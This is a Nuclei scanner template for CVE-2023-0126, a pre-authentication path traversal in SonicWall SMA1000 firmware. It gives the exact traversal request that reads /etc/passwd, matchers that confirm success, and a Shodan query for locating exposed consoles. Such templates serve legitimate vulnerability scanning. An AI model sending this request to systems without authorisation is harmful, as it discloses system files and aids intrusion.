nuclei-templates/http/cves/2023/CVE-2023-0126.yaml

47 lines
1.3 KiB
YAML

id: CVE-2023-0126
info:
name: SonicWall SMA1000 LFI
author: tess
severity: high
description: |
Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-0126
- https://github.com/advisories/GHSA-mr28-27qx-phg3
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0001
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-0126
cwe-id: CWE-22
epss-score: 0.02342
cpe: cpe:2.3:o:sonicwall:sma1000_firmware:12.4.2:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"Appliance Management Console Login"
verified: "true"
vendor: sonicwall
product: sma1000_firmware
tags: cve,cve2023,sonicwall,lfi,sma1000
http:
- method: GET
path:
- '{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd'
matchers-condition: and
matchers:
- type: word
part: header
words:
- content/unknown
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200